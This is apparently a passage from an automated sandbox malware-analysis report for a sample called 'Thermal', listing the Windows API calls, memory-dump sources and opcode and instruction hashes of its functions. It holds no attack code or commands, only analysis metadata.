                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 5ff0f9606ecf3e390030923b756c59a37ef805e2df1481777f3d2bd76544b6a6
                                                      • Instruction ID: e30274fb788f5e1801d7c717dabb72c1c4cdf2023c3177b663a7d86944df053f
                                                      • Opcode Fuzzy Hash: 5ff0f9606ecf3e390030923b756c59a37ef805e2df1481777f3d2bd76544b6a6
                                                      • Instruction Fuzzy Hash: FA117C32C0052DEBCF04AFA9D958AEEBB78FF08741F014145E980B2240CB309691CB91
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001AE1EA
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 001AE201
                                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 001AE216
                                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 001AE234
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: c074846fcf9aeb800162707dadaee9fb4827faf4880913a73ed18b778bac7db2
                                                      • Instruction ID: fb69a3f29645751e3b83b87327ebe24e528b0a4e6132c52abcb5371492be1ba4
                                                      • Opcode Fuzzy Hash: c074846fcf9aeb800162707dadaee9fb4827faf4880913a73ed18b778bac7db2
                                                      • Instruction Fuzzy Hash: 75115BB92063049BE7308F51ED09F93BBFCEB05B00F108A5AE61AD6450D7B5E9489BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: 5e2f0c381bbe8803963b08a30538d217c0a5ef3e03d11ce4c56b5727f4c38fd7
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: E6017B3204814AFBCF125E84EC028EE3F22BB29356F488515FE285C571D736C9B9AB91
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 001AB956
                                                      • ScreenToClient.USER32(?,?), ref: 001AB96E
                                                      • ScreenToClient.USER32(?,?), ref: 001AB992
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001AB9AD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: 2848510b0867bf8d5da887960c96ad205ab942a5450ff73128df5e83d8a77c8e
                                                      • Instruction ID: cdcb43cbac38f69127ef4770dabf4ef7da7ce3ba9662cc261ca938d5e4b1f129
                                                      • Opcode Fuzzy Hash: 2848510b0867bf8d5da887960c96ad205ab942a5450ff73128df5e83d8a77c8e
                                                      • Instruction Fuzzy Hash: D11144B9D04249EFDB41CF98C984AEEBBF9FF48310F104156E914E3610D735AA658F50
                                                      APIs
                                                      • _memset.LIBCMT ref: 001ABCB6
                                                      • _memset.LIBCMT ref: 001ABCC5
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E8F20,001E8F64), ref: 001ABCF4
                                                      • CloseHandle.KERNEL32 ref: 001ABD06
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 5704b73d6a32400f620ddd1469761430eb2a98c557f942d19e0a36eabd982705
                                                      • Instruction ID: cced8c618b43a0bd8ebc3a4d8bd9638f447597dee6bb0a37c1c9debcdd481e6d
                                                      • Opcode Fuzzy Hash: 5704b73d6a32400f620ddd1469761430eb2a98c557f942d19e0a36eabd982705
                                                      • Instruction Fuzzy Hash: D7F082B25403947FE75027A5AC49FBF3A5DEB19754F000521BA0CEA5A2DB724C5097B8
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 001871A1
                                                        • Part of subcall function 00187C7F: _memset.LIBCMT ref: 00187CB4
                                                      • _memmove.LIBCMT ref: 001871C4
                                                      • _memset.LIBCMT ref: 001871D1
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 001871E1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: ce97e05ddaa305d05a2045862cf88403f22c7b68e2698d62dc3951727dd75f7e
                                                      • Instruction ID: 0e55ac36cc3a186634339439e446dd3bd09088f7d3dfcf88fc59e6f2b0679a97
                                                      • Opcode Fuzzy Hash: ce97e05ddaa305d05a2045862cf88403f22c7b68e2698d62dc3951727dd75f7e
                                                      • Instruction Fuzzy Hash: 56F05E3A200104ABCF016F55DC89A8ABB29EF59360F08C051FE085F22ACB32E951DBB4
                                                      APIs
                                                        • Part of subcall function 001216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121738
                                                        • Part of subcall function 001216CF: BeginPath.GDI32(?), ref: 0012174F
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121778
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001AC3E8
                                                      • LineTo.GDI32(00000000,?,?), ref: 001AC3F5
                                                      • EndPath.GDI32(00000000), ref: 001AC405
                                                      • StrokePath.GDI32(00000000), ref: 001AC413
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: 49acb5fc81d6d2c2e55a78f23bb127b3992cc48af20119690966ca6bec48de79
                                                      • Instruction ID: fca1400e3120abea5ee1daa91bb55350f2455e46988bf9c3cb854f43b7284161
                                                      • Opcode Fuzzy Hash: 49acb5fc81d6d2c2e55a78f23bb127b3992cc48af20119690966ca6bec48de79
                                                      • Instruction Fuzzy Hash: D0F0BE31105258BAEB136F94AC0DFCE3F59AF1A350F048100FA11254E183B455A0DBE9
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0017AA6F
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0017AA82
                                                      • GetCurrentThreadId.KERNEL32 ref: 0017AA89
                                                      • AttachThreadInput.USER32(00000000), ref: 0017AA90
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: 0b10178ef5f2e34074200330e28c462690883387d86554433e0e4340db16fa97
                                                      • Instruction ID: 148f98d9d1d204d688849adf2fe32468e28cdcd0a34edd8808b2a9f3a1d30645
                                                      • Opcode Fuzzy Hash: 0b10178ef5f2e34074200330e28c462690883387d86554433e0e4340db16fa97
                                                      • Instruction Fuzzy Hash: DAE03931541228BADB225FA2DD0CEEB3F2CEF597A1F408111F90D85450C771C590CBA1
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 0012260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00122617
                                                      • SetBkMode.GDI32(?,00000001), ref: 0012262C
                                                      • GetStockObject.GDI32(00000005), ref: 00122634
                                                      • GetWindowDC.USER32(?,00000000), ref: 0015C1C4
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0015C1D1
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0015C1EA
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0015C203
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0015C223
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015C22E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: 048a3cce1ac6a973bab3559b2338d193831f1a8c01c3dd8aaaa0a0809c2240cd
                                                      • Instruction ID: 54464c529f7ddefe9a6b5c582bdedaedd9257de2ca3ef8b6ed1803fd6c0ad57f
                                                      • Opcode Fuzzy Hash: 048a3cce1ac6a973bab3559b2338d193831f1a8c01c3dd8aaaa0a0809c2240cd
                                                      • Instruction Fuzzy Hash: 7FE06D32504244FFDB265FA8BC49BE93B21EB09332F048366FE79584E1877189D4DB11
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00179339
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00178F04), ref: 00179340
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00178F04), ref: 0017934D
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00178F04), ref: 00179354
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 2ff88512a6aa99c1cfd35ba910ad792066b74e5903ad5422374f5f2681f61510
                                                      • Instruction ID: c5ee0b9613db3650f2d1d2c2400f3f1770fc18757da8fa7e5c00d2520fe214d5
                                                      • Opcode Fuzzy Hash: 2ff88512a6aa99c1cfd35ba910ad792066b74e5903ad5422374f5f2681f61510
                                                      • Instruction Fuzzy Hash: C6E086326012119FD7612FB15D0DB573BBCFF587D1F108818B245C9090E7349488C750
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00160679
                                                      • GetDC.USER32(00000000), ref: 00160683
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001606A3
                                                      • ReleaseDC.USER32(?), ref: 001606C4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 10b5d0cc103edd24887e6af15bdf97093092d54e4cf89d66f5fbdd5ef4031c38
                                                      • Instruction ID: dc65ff7e3460f62aef1b4f732eab985842d797ce1ef80db2064ad6f1854bec4f
                                                      • Opcode Fuzzy Hash: 10b5d0cc103edd24887e6af15bdf97093092d54e4cf89d66f5fbdd5ef4031c38
                                                      • Instruction Fuzzy Hash: 0DE01A71800204EFCB029FB0D808AAE7BF1EB9C350F128105FC5AA7650DB3885A19F50
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 0016068D
                                                      • GetDC.USER32(00000000), ref: 00160697
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001606A3
                                                      • ReleaseDC.USER32(?), ref: 001606C4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 784ee0a43d86aa7273ea8dde54537f7021d9888455565ed23af0273c05190bd8
                                                      • Instruction ID: 0acc46130db9aa96258df9a73c0147ed1c85d1d90f3f4b327c2f478b3c9faa64
                                                      • Opcode Fuzzy Hash: 784ee0a43d86aa7273ea8dde54537f7021d9888455565ed23af0273c05190bd8
                                                      • Instruction Fuzzy Hash: 4BE01A71800204AFCB129FB0D80865E7BF1AB9C350F118104FD59A7650DB3895918F50
                                                      APIs
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • __wcsnicmp.LIBCMT ref: 0018B670
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0018B739
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: 984be775e493f4584feaa5051ca0f1d68b66e56a65b243f187fa53844c091850
                                                      • Instruction ID: 0f57a432f1f9334905bd12b1b565f6365432fc3e011742e6d40545179605d1fa
                                                      • Opcode Fuzzy Hash: 984be775e493f4584feaa5051ca0f1d68b66e56a65b243f187fa53844c091850
                                                      • Instruction Fuzzy Hash: D5617F75A04219AFCB18EF94C8D1EAEB7B4EF58710F118059F506AB391DB30AE80CF90
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 0012E01E
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0012E037
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 43d787803ea7c17a2c9781305d74a1de0c57d056fd63947da667f2786981e387
                                                      • Instruction ID: f2e89e25136425c27546567246b015c078ac5457b80ad11c481d494e873f5a5d
                                                      • Opcode Fuzzy Hash: 43d787803ea7c17a2c9781305d74a1de0c57d056fd63947da667f2786981e387
                                                      • Instruction Fuzzy Hash: CC5138714087589BE320AF50E886BABBBE8FB94314F91494DF2D8411A1DB709979CB17
                                                      APIs
                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001A8186
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A819B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 430ac5b6afe1d21bbf4c0011760b11ccd2b960fbb1dc2e98f92361347d555f96
                                                      • Instruction ID: d165a801f85f967281264c44dc519d2c9a7e5f16ba8b7167d4344cbecfa8cdba
                                                      • Opcode Fuzzy Hash: 430ac5b6afe1d21bbf4c0011760b11ccd2b960fbb1dc2e98f92361347d555f96
                                                      • Instruction Fuzzy Hash: 05411978A013099FDB14CF64D981BDABBF5FB09300F10016AE905EB391DB71A956CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00192C6A
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00192CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: e31f977c07e7928e96f79ec74ab3ad21985873d7d62b13fecd756233104ef2ab
                                                      • Instruction ID: a90b57e40aa98745033c4850c115bf29a429e480074bf365c24d288f32d4ff28
                                                      • Opcode Fuzzy Hash: e31f977c07e7928e96f79ec74ab3ad21985873d7d62b13fecd756233104ef2ab
                                                      • Instruction Fuzzy Hash: 47310871C00219BBCF15EFA1CC85AEEBFB9FF19310F104059F815A6262EB315A56DBA0
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 001A713C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001A7178
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: a5d3f0df81af7a4513024ea8a4685c05259d87596aae197a8feafc61b133f396
                                                      • Instruction ID: 0dd4a448769d9df08b6d2429fd98a6be7ad5818aa97ae471230438b2d61f01d0
                                                      • Opcode Fuzzy Hash: a5d3f0df81af7a4513024ea8a4685c05259d87596aae197a8feafc61b133f396
                                                      • Instruction Fuzzy Hash: 0731BC75200604AEEB11DF78DC80EFB77A9FF89720F109619F9A987191DB31AD91CB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 001830B8
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001830F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
